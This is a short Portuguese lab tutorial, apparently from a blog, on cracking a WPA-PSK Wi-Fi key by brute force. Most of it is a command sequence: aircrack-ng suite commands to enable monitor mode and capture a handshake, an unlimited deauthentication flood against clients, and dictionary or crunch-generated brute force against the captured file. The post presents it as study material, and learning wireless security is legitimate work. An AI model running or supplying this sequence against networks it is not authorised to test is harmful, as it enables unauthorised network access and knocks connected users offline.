Laboratório: Descoberta de chave WPA por brute force

A tática de descobrir a chave (vulgarmente conhecida como ‘senha do Wi-Fi’) no protocolo de autenticação WPA por intermédio da técnica de força bruta (tentativa e erro) está longe de ser uma das mais eficientes ou inteligentes, mas ainda é muito funcional.

A exemplo do post sobre Criptoanálise com protocolo WEP, abaixo apresento um roteiro objetivo e didático para quem já conhece ou está estudando ataques a redes sem fio WPA com PSK (chave compartilhada de criptografia), onde a wordlist (dicionário utilizado) não precisa ser armazenada no computador do atacante. Vamos a ele:

#Alterar interface de rede para modo monitor

airmon-ng start wlan0

#Monitorar redes (gerando dump)

airodump-ng wlan0mon --bssid MAC_AP -w arquivo -c CANAL wlan0mon

#Desautenticando clientes

aireplay-ng --deauth 0 -c MAC_CLIENTE -a MAC_AP wlan0mon

#Quebrando chave por brute force (com wordlist salva)

aircrack-ng -w wordlist arquivo.cap

#Usando wordlists sem salvar em disco para ataque de brute force

crunch 1 10 1234567890abcdefgh | aircrack-ng -w - -b MAC_AP arquivo.cap